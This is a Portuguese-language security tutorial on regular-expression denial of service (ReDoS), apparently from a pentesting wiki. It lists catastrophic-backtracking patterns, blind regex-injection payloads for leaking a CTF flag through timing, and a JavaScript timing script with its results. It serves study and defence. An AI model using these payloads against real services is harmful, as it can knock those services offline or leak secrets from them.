Denial of Service de Expressão Regular - ReDoS

Denial of Service de Expressão Regular (ReDoS)

Um Denial of Service de Expressão Regular (ReDoS) acontece quando alguém se aproveita das fraquezas de como as expressões regulares (uma maneira de pesquisar e combinar padrões em texto) funcionam. Às vezes, quando as expressões regulares são usadas, elas podem se tornar muito lentas, especialmente se o pedaço de texto com o qual estão trabalhando fica maior. Essa lentidão pode se tornar tão ruim que cresce muito rapidamente com pequenos aumentos no tamanho do texto. Os atacantes podem usar esse problema para fazer um programa que usa expressões regulares parar de funcionar corretamente por um longo período de tempo.

O Algoritmo Naïve de Regex Problemático

Verifique os detalhes em https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS

Regexes Maliciosas

Um padrão malicioso de expressão regular é aquele que pode ficar preso em uma entrada manipulada causando um DoS. Os padrões de regex maliciosos normalmente contêm agrupamento com repetição e repetição ou alternância com sobreposição dentro do grupo repetido. Alguns exemplos de padrões maliciosos incluem:

• (a+)+

• ([a-zA-Z]+)*

• (a|aa)+

• (a|a?)+

• (.*a){x} para x > 10

Todos esses são vulneráveis à entrada aaaaaaaaaaaaaaaaaaaaaaaa!.

Cargas Úteis ReDoS

Exfiltração de String via ReDoS

Em um CTF (ou recompensa por bugs) talvez você controle o Regex com o qual uma informação sensível (a flag) é correspondida. Então, pode ser útil fazer a página congelar (tempo limite ou tempo de processamento mais longo) se o Regex corresponder e não se não corresponder. Dessa forma, você poderá exfiltrar a string caractere por caractere:

• Neste post você pode encontrar esta regra ReDoS: ^(?=<flag>)((.*)*)*salt$

• Exemplo: ^(?=HTB{sOmE_fl§N§)((.*)*)*salt$

• Neste writeup você pode encontrar esta:<flag>(((((((.*)*)*)*)*)*)*)!

• Neste writeup ele usou: ^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$

Controle de Entrada e Regex ReDoS

Os seguintes são exemplos de ReDoS onde você controla tanto a entrada quanto o regex:

function check_time_regexp(regexp, text){
var t0 = new Date().getTime();;
new RegExp(regexp).test(text);
var t1 = new Date().getTime();;
console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")
}

// This payloads work because the input has several "a"s
[
//  "((a+)+)+$",  //Eternal,
//  "(a?){100}$", //Eternal
"(a|a?)+$",
"(\\w*)+$",   //Generic
"(a*)+$",
"(.*a){100}$",
"([a-zA-Z]+)*$", //Generic
"(a+)*$",
].forEach(regexp => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))

/*
Regexp (a|a?)+$ took 5076 milliseconds.
Regexp (\w*)+$ took 3198 milliseconds.
Regexp (a*)+$ took 3281 milliseconds.
Regexp (.*a){100}$ took 1436 milliseconds.
Regexp ([a-zA-Z]+)*$ took 773 milliseconds.
Regexp (a+)*$ took 723 milliseconds.
*/

Ferramentas

• https://github.com/doyensec/regexploit

• https://devina.io/redos-checker

Referências

• https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS

• https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets

• https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html

• https://ctftime.org/writeup/25869